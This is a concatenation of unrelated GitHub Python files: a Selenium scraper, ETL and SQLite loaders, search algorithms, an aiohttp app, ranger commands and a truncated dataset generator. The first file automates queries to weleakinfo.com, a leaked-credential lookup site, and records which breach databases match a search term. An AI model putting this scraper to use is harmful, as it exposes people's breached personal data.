os\nimport re\n\n\n\nclass Dashboard(TemplateView):\n\ttemplate_name = \"bot_app/dashboard.html\"\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(Dashboard, self).get_context_data(**kwargs)\n\t\t# import pdb; pdb.set_trace()\n\t\turl = 'https://weleakinfo.com/'\n\t\tdriver = webdriver.Chrome('/usr/bin/chromedriver')  # path to the chromedriver executable\n\t\tdriver.get(url)\n\t\tsleep(7)\n\t\tform_query = self.request.GET.get('form_query',None)\n\t\tform_type = self.request.GET.get('form_type',None)\n\n\t\tprint(form_query, \" *****form_query*****\")\n\t\tprint(form_type, \" @@@@@form_type@@@@@\")\n\n\t\t\n\n\t\tif form_query and form_type:\n\t\t\tquery = driver.find_element_by_name('query')\n\t\t\ttype_q = driver.find_element_by_name('type')\n\n\t\t\tif form_query:\n\t\t\t\tquery.send_keys(form_query)\n\n\t\t\tif form_type:\n\t\t\t\ttype_q.send_keys(form_type)\n\n\t\t\tdriver.find_element_by_name('search').click()\n\t\t\tsleep(5)\n\t\t\tres = driver.find_element_by_id('result')\n\t\t\tres_txt = res.text\n\n\t\t\tres1 = driver.find_element_by_css_selector('.poorfag')\n\t\t\tres1_txt = res1.text\n\t\t\tres_err = None\n\t\t\tif res1_txt:\n\t\t\t\tresult = { \n\t\t\t\t\t\t\"query_time\": res_txt,\n\t\t\t\t\t \t\"database\" : res1_txt,\n\t\t\t\t\t }\n\t\t\telse:\n\t\t\t\tres_err = driver.find_element_by_css_selector('.alert.alert-danger.warning')\n\t\t\t\tres_err_txt = res_err.text\n\t\t\t\tresult = None\n\t\t\t\n\t\t\tprint(result)\n\t\t\tif 
result:\n\t\t\t\tsave_output(result,form_query,form_type)\n\t\t\n\t\treturn context\n\n\n\ndef save_output(result,query_term,query_type):\n\n\tfile_name = \"output.txt\"\n\tis_exists = os.path.exists(file_name)\n\tquery_time = re.findall(r'Query Time: ([0-9]+(?:\\.[0-9]+)?)(?:\\s)',result[\"query_time\"])\n\ttotal_hits = re.findall(r\"Total: ([0-9]+(?:\\.[0-9]+)?)(?:\\s)\", result[\"query_time\"])\n\twebsite_no = re.findall(r\"([0-9]+) Website\",result[\"query_time\"])\n\tno_of_results = re.findall(r\"Found ([0-9]+)\", result[\"database\"])\n\tdatabase = re.findall(r\"results in (.+)\", result[\"database\"])\n\n\tif len(database)<=0:\n\t\tdatabase = re.findall(r\"result in (.+)\", result[\"database\"])\n\n\n\tif is_exists:\n\t\twith open(file_name,'a') as fp:\n\t\t\tdata = query_term+\"\\t\"+query_type+\"\\t\"+str(query_time[0])+\"\\t\"+str(total_hits[0])+\"\\t\"+str(website_no[0])+\"\\t\"+str(no_of_results[0])+\"\\t\"+str(database[0])+\"\\n\"\n\t\t\tprint(\"data \", data)\n\t\t\tfp.write(data)\n\n\telse:\n\t\twith open(file_name, 'w+') as fp:\n\t\t\tcolumn_names = \"query_term\\tquery_type\\tquery_time\\ttotal_hits\\twebsite_no\\tno_of_results\\tdatabase\\n\"\n\t\t\tdata = query_term+\"\\t\"+query_type+\"\\t\"+str(query_time[0])+\"\\t\"+str(total_hits[0])+\"\\t\"+str(website_no[0])+\"\\t\"+str(no_of_results[0])+\"\\t\"+str(database[0])+\"\\n\"\n\t\t\tfp.write(column_names)\n\t\t\tfp.write(data)\n\n\n\n\n\n\t","repo_name":"Kajalwaldiya/scraper-bot","sub_path":"bot_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72839665368","text":"import configparser\nimport psycopg2\nfrom sql_queries import copy_table_queries, insert_table_queries, get_sample_table_queries,create_table_queries, drop_table_queries\nimport argparse\nimport pandas as pd\n\ndef drop_tables(cur, conn):\n    \"\"\"\n    drop all tables listed in drop_table_queries\n    \"\"\"\n    for query in drop_table_queries:\n        print(query)\n        cur.execute(query)\n        conn.commit()\n\n\ndef create_tables(cur, conn):\n    \"\"\"\n    create all tables listed in create_table_queries\n    \"\"\"\n    for query in create_table_queries:\n        print(query)\n        cur.execute(query)\n        conn.commit()\n\ndef load_staging_tables(cur, conn):\n    \"\"\"\n    load staging tables from S3 to Redshift\n    \"\"\"\n    for query in copy_table_queries:\n        print(query)\n        cur.execute(query)\n        conn.commit()\n\n\ndef insert_tables(cur, conn):\n    \"\"\"\n    use the staging tables to create the fact table & dimension tables\n    \"\"\"\n    for query in insert_table_queries:\n        print(query)\n        cur.execute(query)\n        conn.commit()\n\ndef get_sample_data(cur, conn):\n    \"\"\"\n    get sample rows from the tables\n    \"\"\"\n    for query in get_sample_table_queries:\n        print(query)\n        cur.execute(query)\n        conn.commit()\n        num_fields = len(cur.description)\n        field_names = [i[0] for i in cur.description]\n        print(cur.fetchall())\n        print('---------------------------')\n\nif __name__ == \"__main__\":\n# commandline args\n    parser = argparse.ArgumentParser()\n    parser.print_help()\n    parser.add_argument('-pipeline',required=False, action=\"store_true\",help='create->copy->insert->sample tables')\n    parser.add_argument('-create',required=False, action=\"store_true\",help='create table')\n    parser.add_argument('-insert',required=False, action=\"store_true\",help='insert table')\n    parser.add_argument('-copy',required=False, action=\"store_true\",help='copy table from s3 to redshift')\n    parser.add_argument('-sample',required=False, action=\"store_true\",help='get sample data')\n    parser.add_argument('-drop',required=False, 
action=\"store_true\",help='drop tables')\n args = parser.parse_args()\n\n# dwh config\n config = configparser.ConfigParser()\n config.read('dwh.cfg')\n\n# connect database\n conn = psycopg2.connect(\"host={} dbname={} user={} password={} port={}\".format(*config['CLUSTER'].values()))\n cur = conn.cursor()\n \n if args.pipeline:\n create_tables(cur,conn) \n load_staging_tables(cur,conn)\n insert_tables(cur, conn)\n get_sample_data(cur, conn)\n elif args.create:\n create_tables(cur,conn)\n elif args.copy:\n load_staging_tables(cur,conn)\n elif args.insert:\n insert_tables(cur, conn)\n elif args.sample:\n get_sample_data(cur, conn)\n elif args.drop:\n drop_tables(cur,conn)\n\n conn.close()","repo_name":"CuteLemon/DataEngineer","sub_path":"DataWarehouse/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":2719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73701038809","text":"import sqlite3\nimport csv\n\n#Abrimos el archivo CSV\nf=open('C:UsersAdminDesktopPosiciones.csv','r') \n#Omitimos la linea de encabezado\nnext(f, None)\nreader = csv.reader(f, delimiter=';')\n\n#Crea la BD en la carpeta donde se encuentra el script\nsql = sqlite3.connect('Posiciones.db')\ncur = sql.cursor()\n\n#Creamos la tabla si no existe\ncur.execute('''CREATE TABLE IF NOT EXISTS posiciones\n (posicion int, nombre text, equipo text, tiempo text)''')\n\n#Llenamos la BD con los datos del CSV\nfor row in reader:\n cur.execute(\"INSERT INTO posiciones VALUES (?, ?, ?, ?)\", (row[0], row[1], row[2], row[3]))\n\n#Muestro las filas guardadas en la tabla\nfor row in cur.execute('SELECT * FROM posiciones'):\n print(row)\n\n#Cerramos el archivo y la conexion a la bd\nf.close()\nsql.commit()\nsql.close()","repo_name":"emersondivB0/PyProjects","sub_path":"coursera/Capstone/Datasets/csv2sqlite.py","file_name":"csv2sqlite.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15527936817","text":"\n# File: Search.py\n# Written by: Siqi Lin\n# Date: 2/5/16\n# Class: CMSC 471\n# Instructor: Maksym Morawski\n# Section: 02\n\n#!/usr/bin/python\nfrom queue import PriorityQueue\nfrom collections import deque\nimport sys, getopt\n\nclass Vertex(object):\n\n def __init__(self, vertexName,vertexCost):\n self.vertex_name = vertexName\n self.cost = vertexCost\n\n# File parsing \ndef ReadFile(fileName):\n\n graph = {}\n \n #open the input file to read\n infile = open(fileName, 'r')\n\n #iteate through the file\n for line in infile:\n key = line[0]\n value = Vertex(line[2],line[4])\n if key in graph:\n #assign edges of a node\n graph[key].append(value)\n else:\n graph[key] = [value]\n\n \n # for key, valueList in graph.items():\n # print(\"key\", key, end=\" \")\n # for item in valueList:\n # print(\"Value: \" ,item.vertex_name, end=\":\")\n # print(item.cost)\n \n return graph\n\n# Write to an output file\ndef OutputFile(fileName, path):\n outfile = open(fileName, 'w')\n for item in path:\n outfile.write(item)\n outfile.write(\"\\n\")\n\ndef print_path(path):\n print(\"STARTING TO PRINT PATH\")\n\n for item in path:\n print(item)\n\n# Begin DFS\ndef depth_first_search(graph, start, end,fileName):\n stack = []\n path = []\n visited = []\n\n stack.append(start)\n # if the starting node and the ending node is the same\n if(start == end):\n path.append(start)\n OutputFile(fileName,path)\n return 0\n else:\n try:\n #Ensure that the stack is not empty\n while stack:\n 
current_vertex = stack.pop()\n                if(current_vertex not in graph.keys() and current_vertex != end):\n                    path.pop()\n                    current_vertex = stack.pop()\n                path.append(current_vertex)\n                # a path has been found\n                if current_vertex == end:\n                    OutputFile(fileName,path)\n                    return 0\n                # append to the visited list\n                if current_vertex not in visited:\n                    visited.append(current_vertex)\n                    for item in graph[current_vertex]:\n                        stack.append(item.vertex_name)\n        # path not found\n        except:\n            OutputFile(fileName,path)\n# End DFS\n\n# Begin BFS\ndef breadth_first_search(graph, start, end, fileName):\n    queue = deque([])\n    path = []\n    visited = []\n    trace = {}\n    queue.append(start)\n    # if the starting node and the ending node are the same\n    if (start == end):\n        path.append(start)\n        OutputFile(fileName,path)\n        return 0\n    else:\n        # Ensure the queue is not empty\n        while queue:\n            try: \n                current_vertex = queue.popleft()\n                if(current_vertex not in graph.keys() and current_vertex != end):\n                    current_vertex = queue.popleft()\n                # if the path has been found\n                if current_vertex == end:\n                    iterator = current_vertex\n                    path.append(iterator)\n                    # Trace back from the current node to the source node\n                    while iterator != start:\n                        iterator = trace[iterator]\n                        path.append(iterator)\n                    path.reverse()\n                    OutputFile(fileName,path)\n                    return 0\n                if current_vertex not in visited:\n                    visited.append(current_vertex)\n                    for item in graph[current_vertex]:\n                        #print(\"Before:\",queue)\n                        #print(\"Item to be appended\", item.vertex_name)\n                        flag = item.vertex_name in queue\n                        if not flag:\n                            queue.append(item.vertex_name)\n                            trace[item.vertex_name] = current_vertex\n                    #print(queue)\n            # no path has been found\n            except:\n                OutputFile(fileName,path)\n# End BFS\n\n# Begin UCS\ndef uniform_cost_search(graph, start,end,fileName):\n    distance = {}\n    # prev is used to trace paths\n    prev = {}\n    distance[start] = 0\n    stack = []\n    pQueue = PriorityQueue()\n    temp_list = []\n\n    for key in graph.keys():\n        if key != start:\n            # Initializing distance as infinity and previous node as unknown\n            distance[key] = 9999\n            prev[key] = ''\n            # Insert item onto pQueue with priority\n            pQueue.put(([distance[key]], key))\n        for value in graph[key]:\n            if value.vertex_name not in graph.keys():\n                if value.vertex_name != start:\n                    distance[value.vertex_name] = 9999\n                    prev[value.vertex_name] = ''\n                    # insert an item onto the priority queue with priority\n                    pQueue.put(([distance[value.vertex_name]], value.vertex_name))\n\n    #print(\"PREV: \", prev)\n\n    while not pQueue.empty():\n        current_vertex = pQueue.get()[1]\n        #return 0\n        # loop through the neighbors of the current_vertex\n        if current_vertex in graph.keys():\n            # tempQueue = PriorityQueue()\n            # tempQueue = pQueue\n            for neighbor in graph[current_vertex]:\n                # calculate the cost needed to go from start to the neighbor\n                temp_cost = distance[current_vertex] + int(neighbor.cost)\n                if temp_cost < distance[neighbor.vertex_name]:\n                    distance[neighbor.vertex_name] = temp_cost\n                    prev[neighbor.vertex_name] = current_vertex\n                    temp_list = pQueue.queue\n                    # decrease priority\n                    temp_list[0][0][0] = distance[neighbor.vertex_name]\n                    #print(\"Queue:\",pQueue.queue)\n                    #print(\"vertex:\", neighbor.vertex_name)\n                    #print(\"distance:\", distance[neighbor.vertex_name])\n    iterator = end\n    #print(\"iterator:\" ,iterator)\n    #print(\"prev[iterator]:\",prev[iterator])\n    while( (iterator != start) and (prev[iterator] != '')):\n        print(iterator)\n        stack.append(iterator)\n        iterator = prev[iterator]\n    stack.append(start)\n    stack.reverse()\n    OutputFile(fileName,stack)\n\n\n    return 0\n# End UCS\n\n\ndef main():\n    \n    
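# example invocation (hypothetical file names):\n    #   python Search.py graph.txt path.txt A F DFS\n    # where each line of graph.txt encodes one edge as \"A B 3\" (from, to, cost)\n    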
map = {}\n\n    if len(sys.argv) != 6:\n        print('Usage: python Search.py <inputFile> <outputFile> ', end=\"\")\n        print('<startNode> <endNode> <searchType>')\n    else:\n        inputFile = str(sys.argv[1])\n        outputFile = str(sys.argv[2])\n        startNode = str(sys.argv[3])\n        endNode = str(sys.argv[4])\n        searchType = str(sys.argv[5])\n\n        # file parsing\n        map = ReadFile(inputFile)\n\n        # perform searches\n        if searchType == \"DFS\":\n            depth_first_search(map, startNode, endNode,outputFile)\n        elif searchType == \"BFS\":\n            breadth_first_search(map, startNode, endNode,outputFile)\n        elif searchType == \"UCS\":\n            uniform_cost_search(map, startNode, endNode,outputFile)\n        else:\n            print('Usage: python Search.py <inputFile> <outputFile> ', end=\"\")\n            print('<startNode> <endNode> <searchType>') \n\n\nmain()\n","repo_name":"TBry13/AIProject1","sub_path":"linsiqi1/Search.py","file_name":"Search.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"22837038208","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport importlib\nfrom cosyai.util import check_config_none\n\n\nclass Dataset(object):\n    def __new__(cls, conf):\n        check_config_none(conf, [\"data_type\"])\n        if conf.data_type == \"segy\":\n            raise NotImplementedError\n        module = importlib.import_module('cosyai.dataset')\n        return getattr(module, conf.data_type)(conf)\n\n\nclass _BaseDataset(object):\n    def __init__(self, conf):\n        super().__init__()\n        self.conf = conf\n","repo_name":"ChipSum-Group/CosyAI","sub_path":"cosyai/dataset/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12181789328","text":"import logging\nimport os\n\nimport aiohttp_jinja2\nimport jinja2\nfrom aiojobs.aiohttp import setup as setup_aiojobs\nfrom aiohttp import web, web_middlewares\n\nfrom . 
import settings\nfrom ..db.models import close_pg, init_pg\nfrom ..db.consumers import register_consumer_in_the_database\nfrom ..db.settings import get_postgres_credentials\nfrom .urls import setup_routes\n\n\"\"\"\nRun either of the following commands from the parent of the current directory:\n\nadev runserver consumer --livereload\n\npython3 -m sequence_search.consumer\n\"\"\"\n\n\nasync def on_startup(app):\n    # initialize database connection\n    await init_pg(app)\n\n    # register self in the database\n    await register_consumer_in_the_database(app)\n\n    # clear queries and results directories\n    for name in os.listdir(settings.RESULTS_DIR):\n        os.remove(settings.RESULTS_DIR / name)\n\n    for name in os.listdir(settings.QUERY_DIR):\n        os.remove(settings.QUERY_DIR / name)\n\n    for name in os.listdir(settings.INFERNAL_RESULTS_DIR):\n        os.remove(settings.INFERNAL_RESULTS_DIR / name)\n\n    for name in os.listdir(settings.INFERNAL_QUERY_DIR):\n        os.remove(settings.INFERNAL_QUERY_DIR / name)\n\n\ndef create_app():\n    logging.basicConfig(level=logging.DEBUG)\n\n    app = web.Application(middlewares=[\n        web_middlewares.normalize_path_middleware(append_slash=True),\n    ], client_max_size=4096**2)\n\n    app.update(name='consumer', settings=settings)\n\n    # setup Jinja2 template renderer\n    aiohttp_jinja2.setup(app, loader=jinja2.FileSystemLoader(str(settings.PROJECT_ROOT / 'templates')))\n\n    # get credentials of the correct environment\n    for key, value in get_postgres_credentials(settings.ENVIRONMENT)._asdict().items():\n        setattr(app['settings'], key, value)\n\n    # create db connection on startup, shutdown on exit\n    app.on_startup.append(on_startup)\n    app.on_cleanup.append(close_pg)\n\n    # setup views and routes\n    setup_routes(app)\n\n    # setup middlewares\n    # setup_middlewares(app)\n\n    # setup aiojobs scheduler\n    setup_aiojobs(app)\n\n    return app\n\n\napp = create_app()\n\n\nif __name__ == '__main__':\n    web.run_app(app, host=settings.HOST, port=settings.PORT)\n\n    # Why using thread pool at all? Because there can be blocking calls: https://pymotw.com/3/asyncio/executors.html\n    # pool = ThreadPoolExecutor(max_workers=1)\n    # loop.run_in_executor(self.pool, get_request, url)\n    # data = deque([])\n","repo_name":"RNAcentral/rnacentral-sequence-search","sub_path":"sequence_search/consumer/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"35748580734","text":"dayname_fr = [\n    \"Dimanche\",\n    \"Lundi\",\n    \"Mardi\",\n    \"Mercredi\",\n    \"Jeudi\",\n    \"Vendredi\",\n    \"Samedi\",\n    \"Dimanche\",\n]\n\ndayname_en = [\n    \"Sunday\",\n    \"Monday\",\n    \"Tuesday\",\n    \"Wednesday\",\n    \"Thursday\",\n    \"Friday\",\n    \"Saturday\",\n    \"Sunday\",\n]\n\ndayname = dayname_fr\ndayname_int = {name.upper(): idx for idx, name in enumerate(dayname_en)}\n","repo_name":"MaKess/student-planner-web","sub_path":"webplanner/defines.py","file_name":"defines.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8401545777","text":"import logging\nfrom os.path import realpath\nfrom utils import create_environment_config\nfrom utils import unpack_tar\nfrom utils import neptune_download\nfrom utils import load_model\n\nDATA_VERSION = 'data_221101/'\n\"\"\"\nScript commands:\n    1. Set up the environment\n    2. Update the model\n    3. Get predictions\n    4. 
Update the results\n\"\"\"\n\ndef set_environment(destination_folder:str):\n    # Setting up the environment\n    # 1. Download all dictionaries and word2vec embeddings\n    # 2. Unpack word2vec\n    # 3. Download version 1 of the NN model for HOME prediction\n    destination_folder = realpath(destination_folder) + '/'\n\n    logging.basicConfig(\n        level=logging.INFO,\n        filename=destination_folder + \"set_environment.log\",\n        filemode=\"w\",\n    )\n    env_dict = {\n        DATA_VERSION + \"team_GId_dict\": \"team_GId_dict.pickle\",\n        DATA_VERSION + \"word2vec\": \"word2vec.wordvectors.tar.gz\",\n    }\n\n    create_environment_config(\n        {\"destination_folder\": destination_folder}\n    )\n    for cnt, env in enumerate(env_dict.items()):\n        saved_name, file_name = env\n        print(f\"Downloading: {file_name}...{cnt + 1}/{len(env_dict)}\")\n        neptune_download(saved_name, destination_folder + file_name)\n        if saved_name.split(\"/\")[1] != \"word2vec\":\n            create_environment_config(\n                {saved_name.split(\"/\")[1]: destination_folder + file_name}\n            )\n\n    create_environment_config(\n        {\"word2vec\": unpack_tar(destination_folder + env_dict[DATA_VERSION + \"word2vec\"])}\n    )\n    model_num = 3\n    model_type = \"HOME\"\n    create_environment_config(\n        {\n            \"tf_model\": load_model(\n                folder_name=destination_folder,\n                model_num=model_num,\n                model_type=model_type,\n            ),\n            \"model_type\": \"HOME\",\n            \"model_no\": \"1\",\n        }\n    )\n\n","repo_name":"cappelchi/calcio","sub_path":"src/calcio/set_environment.py","file_name":"set_environment.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"75048717529","text":"import os\nimport numpy as np\nfrom treatment_graph import read_treatment_data\n\ndef main():\n    dataset = 'auto25'\n    if dataset == 'hao_true_lmci':\n        file_name = 'hao_true_lmci,True,n,52,0.csv'\n        feature_list = ['a', 'tau_p', 'n', 'c']\n        treatment_time = 52\n        treatment_feature = 'n'\n    elif dataset == 'zheng':\n        file_name = 'zheng,False,n,0,0.csv'\n        feature_list = ['a', 'tau', 'n', 'c']\n        treatment_time = 0\n        treatment_feature = 'n'\n    elif dataset == 'auto25':\n        file_name = 'auto25,False,node_15,1,1.csv'\n        feature_list = ['node_{}'.format(i) for i in range(5, 25)]\n        treatment_time = 1\n        treatment_feature = 'node_15'\n    elif dataset == 'auto50':\n        file_name = 'hao_true_lmci,True,n,52,0.csv'\n        feature_list = ['node_{}'.format(i) for i in range(5, 50)]\n        treatment_time = 1\n        treatment_feature = 'node_15'\n    else:\n        raise ValueError('unknown dataset: {}'.format(dataset))\n    data_dict, time_list = read_treatment_data(file_name, feature_list)\n    valid_idx = 0\n    for i, time in enumerate(time_list):\n        if treatment_time > time:\n            valid_idx = i\n\n    result_dict = dict()\n    for sample in data_dict:\n        for model_name in data_dict[sample]:\n            if model_name not in result_dict:\n                result_dict[model_name] = dict()\n            for feature in data_dict[sample][model_name]:\n                if feature not in result_dict[model_name]:\n                    result_dict[model_name][feature] = []\n                max_data = data_dict[sample][model_name][feature]['max'][valid_idx:]\n                mean_data = data_dict[sample][model_name][feature]['mean'][valid_idx:]\n                min_data = data_dict[sample][model_name][feature]['min'][valid_idx:]\n                result_dict[model_name][feature].append([max_data, mean_data, min_data])\n\n    for model_name in result_dict:\n        full_obs = 0\n        correct_obs = 0\n        for feature in result_dict[model_name]:\n            if feature == treatment_feature:\n                continue\n            oracle_data = np.array([item[1]for item in result_dict['oracle'][feature]])\n            predict_max = np.array([item[0]for item in 
result_dict[model_name][feature]])\n predict_min = np.array([item[2]for item in result_dict[model_name][feature]])\n\n c1 = oracle_data < predict_max\n c2 = oracle_data > predict_min\n correct = c1 * c2\n full_obs = full_obs + len(correct) * len(correct[0])\n correct_obs = correct_obs + np.sum(correct)\n print('model name: {}, correct ratio: {}'.format(model_name, correct_obs/full_obs))\n print('')\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DanielSun94/CFPA","sub_path":"result_generate/treatment_inclusion.py","file_name":"treatment_inclusion.py","file_ext":"py","file_size_in_byte":2713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"48556908224","text":"def Fn(n):\n if n <= 1:\n return n\n else:\n return(Fn(n-1) + Fn(n-2))\n\n# take input from the user\nn = int(input(\"Enter a Number: \"))\n\n# check if the number is valid\nif n <= 0:\n print(\"Invalid\")\nelse:\n print(\"Fibonacci sequence:\")\n for i in range(n):\n print(Fn(i))\n","repo_name":"HCYENDLURI/MyFirstPythonPro","sub_path":"FibonacciSeries.py","file_name":"FibonacciSeries.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41010659295","text":"import time, os\nfrom functools import wraps\nimport numpy as np\nprint(\"my_module\"+os.sep+\"time_deco.py is loaded\")\nglobal TIME_PRINT\nTIME_PRINT = 0\n\nproc_num=-1\ndef time_deco(_a, cn):\n def wrappedwrapper(f):\n @wraps(f)\n def wrapper(*args, **kwargs):\n global proc_num\n proc_num+=1\n now_num=proc_num\n if _a:\n print( '\\n{0:0>3}:{1}.{2}({3}, {4}) {5}'.format(proc_num, cn, str(f.__name__), \n [i if not isinstance(i, list) else np.array(i) for j,i in enumerate(args) if not j==0], kwargs, '-'*20))\n with open('log.txt', 'a') as fl:\n fl.write('\\n\\r{0:0>3}:{1}.{2}({3}, {4}) {5}\\n\\r'.format(proc_num, cn, str(f.__name__), \n [i if not isinstance(i, list) else np.array(i) for j,i in enumerate(args) if not j==0], kwargs, '-'*20))\n\n before = time.time()\n result = f(*args, **kwargs)\n after = time.time()\n if _a:\n print('{0}{1:0>3} was used {2} sec\\n'.format('-'*20, now_num, float(after - before))) \n with open('log.txt', 'a') as fl:\n fl.write('\\n\\r{0}{1:0>3} was used {2} sec\\n\\r'.format('-'*20, now_num, float(after - before)))\n return result \n return wrapper\n return wrappedwrapper\n","repo_name":"kirin-syukatu/module","sub_path":"time_deco.py","file_name":"time_deco.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27810213282","text":"# This is a sample commands.py. You can add your own commands here.\n#\n# Please refer to commands_full.py for all the default commands and a complete\n# documentation. 
Do NOT add them all here, or you may end up with defunct\n# commands when upgrading ranger.\n\n# A simple command for demonstration purposes follows.\n# -----------------------------------------------------------------------------\n\nfrom __future__ import (absolute_import, division, print_function)\n\n# You can import any python module as needed.\nimport os\n\n# You always need to import ranger.api.commands here to get the Command class:\nfrom ranger.api.commands import Command\n\nfrom ranger.core.loader import CommandLoader\n\nclass extracthere(Command):\n    def execute(self):\n        \"\"\" Extract copied files to current directory \"\"\"\n        copied_files = tuple(self.fm.copy_buffer)\n\n        if not copied_files:\n            return\n\n        def refresh(_):\n            cwd = self.fm.get_directory(original_path)\n            cwd.load_content()\n\n        one_file = copied_files[0]\n        cwd = self.fm.thisdir\n        original_path = cwd.path\n        au_flags = ['-X', cwd.path]\n        au_flags += self.line.split()[1:]\n        au_flags += ['-e']\n\n        self.fm.copy_buffer.clear()\n        self.fm.cut_buffer = False\n        if len(copied_files) == 1:\n            descr = \"extracting: \" + os.path.basename(one_file.path)\n        else:\n            descr = \"extracting files from: \" + os.path.basename(one_file.dirname)\n        obj = CommandLoader(args=['aunpack'] + au_flags \\\n                + [f.path for f in copied_files], descr=descr)\n\n        obj.signal_bind('after', refresh)\n        self.fm.loader.add(obj)\n\nclass fzf_select(Command):\n    \"\"\"\n    :fzf_select\n\n    Find a file using fzf.\n\n    With a prefix argument select only directories.\n    See: https://github.com/junegunn/fzf\n    \"\"\"\n\n    def execute(self):\n        import subprocess\n        if self.quantifier:\n            # match only directories\n            command = \"find -L . \\( -path '*/\\.*' -o -fstype 'dev' -o -fstype 'proc' \\) -prune \\\n            -o -type d -print 2> /dev/null | sed 1d | cut -b3- | fzf +m\"\n        else:\n            # match files and directories\n            command = \"find -L . 
\\( -path '*/\\.*' -o -fstype 'dev' -o -fstype 'proc' \\) -prune \\\n            -o -print 2> /dev/null | sed 1d | cut -b3- | fzf +m\"\n        fzf = self.fm.execute_command(command, stdout=subprocess.PIPE)\n        stdout, stderr = fzf.communicate()\n        if fzf.returncode == 0:\n            fzf_file = os.path.abspath(stdout.decode('utf-8').rstrip('\\n'))\n            if os.path.isdir(fzf_file):\n                self.fm.cd(fzf_file)\n            else:\n                self.fm.select_file(fzf_file)\n","repo_name":"kuzzmi/dotfiles","sub_path":"ranger/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"32368033526","text":"import numpy as np\nfrom typing import Dict, List\nfrom .textures import get_texture\nfrom .materials import get_material\nfrom .utils import get_quaternion\n\n\nKUBASIC_IDS = (\n    \"cube\", \n    \"cylinder\", \n    \"sphere\", \n    \"cone\", \n    \"torus\", \n    \"gear\",\n    \"torus_knot\", \n    \"sponge\", \n    \"spot\", \n    \"suzanne\"\n)\n\nTEXTURES = [\n    'NONE',\n    # 'IMAGE',\n    'CLOUDS',\n    'DISTORTED_NOISE',\n    'MAGIC',\n    'MARBLE',\n    'MUSGRAVE',\n    'STUCCI',\n    'VORONOI',\n    'WOOD'\n]\n\n\ndef latent_dataset(\n    num_scenes: int = 100,\n    resolution: List[int] = [256, 144],\n    min_num_objects: int = 3,\n    max_num_objects: int = 6,\n    spawn_region: List[List[float]] = [[-2.5, -3.0, 0.2], [2.5, 3.0, 1.5]],\n    sun_position: List[float] = [0.0, 0.0, 7.0],\n    camera_position: List[float] = [0.0, -8.0, 3.6],\n    camera_look_at: List[float] = [0.0, 0.0, 0.5],\n    camera_focal_length: float = 32.0,\n    camera_sensor_width: float = 30.0,\n    floor_scale: List[float] = [20.0, 40.0, 0.01],\n    floor_position: List[float] = [0.0, 0.0, 0.0],\n    background_type: str = \"artificial\",\n    dataset_comment: str = \"test\"\n) -> List[Dict]:\n    \n    \"\"\"\n    A dataset returns a list of dictionaries; each dictionary is the config for a single scene.\n    Default values are set for mouse data.\n\n    The dataset thus contains all the scenes that will be subsequently generated.\n    The list of config dictionaries will be passed to the ImageConfig table, and from there it will be rendered.\n    So this function will not generate scenes yet, but it will create the configs that will generate the scenes.\n\n    Args:\n        num_scenes: number of scenes to generate scene configs for\n        resolution: (height, width)\n        min_num_objects: minimum number of objects in a scene\n        max_num_objects: maximum number of objects in a scene\n        spawn_region: [[min_x, min_y, min_z], [max_x, max_y, max_z]]\n        sun_position: [x, y, z]\n        camera_position: [x, y, z]\n        camera_look_at: [x, y, z]\n        camera_focal_length: focal length of the camera\n        camera_sensor_width: sensor width of the camera\n        floor_scale: [x, y, z]\n        floor_position: [x, y, z]\n        background_type: \"artificial\" or \"realistic\"\n        dataset_comment: str describing the dataset\n\n    Returns:\n        A list of dictionaries, each dictionary is the config for a single image.\n    \"\"\"\n\n    if len(resolution) != 2:\n        raise ValueError(\n            \"resolution should be a list of ints of length=2, e.g., [256, 256]\"\n        )\n\n    if len(spawn_region) != 2:\n        raise ValueError(\n            \"spawn region should be a list of lists of length 3, e.g., [[-2.5, -3.0, 0.2], [2.5, 3.0, 1.5]]\"\n        )\n\n    for sr in spawn_region:\n        if len(sr) != 3:\n            raise ValueError(\n                \"spawn region should be a list of 2 lists of length 3, e.g., [[-2.5, -3.0, 0.2], [2.5, 3.0, 1.5]]\"\n            )\n\n    if len(sun_position) != 3:\n        raise ValueError(\n            \"sun position should be a list of length 3, e.g., [0.0, 0.0, 7.0]\"\n        )\n\n    if len(camera_position) != 3:\n        
